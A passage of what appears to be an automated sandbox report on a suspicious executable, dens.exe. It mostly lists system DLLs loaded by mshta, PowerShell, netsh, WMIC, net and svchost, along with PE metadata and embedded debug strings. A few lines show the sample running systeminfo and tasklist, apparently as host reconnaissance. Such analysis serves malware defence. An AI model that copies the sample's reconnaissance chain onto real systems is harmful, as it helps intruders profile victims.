            Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: napinsp.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: pnrpnsp.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: wshbth.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: nlaapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: dnsapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: winrnr.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\query.exeSection loaded: regapi.dll
            Source: C:\Windows\System32\quser.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\quser.exeSection loaded: utildll.dll
            Source: C:\Windows\System32\quser.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\quser.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Users\user\Desktop\dens.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: dens.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: dens.exeStatic file information: File size 16905542 > 1048576
            Source: dens.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: dens.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: dens.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: dens.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: dens.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: dens.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: dens.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: dens.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666353635.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cryptography_rust.pdbc source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: dens.exe, 00000000.00000003.1664185093.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: dens.exe, 00000000.00000003.1663980456.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665572074.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665989863.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664659823.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666061436.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664385796.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: dens.exe, 00000000.00000003.1661475799.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665921025.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665989863.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665091592.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666599668.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: dens.exe, 00000000.00000003.1663850239.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665639486.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665022014.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665234767.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664117143.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665921025.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666599668.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664318244.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665572074.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
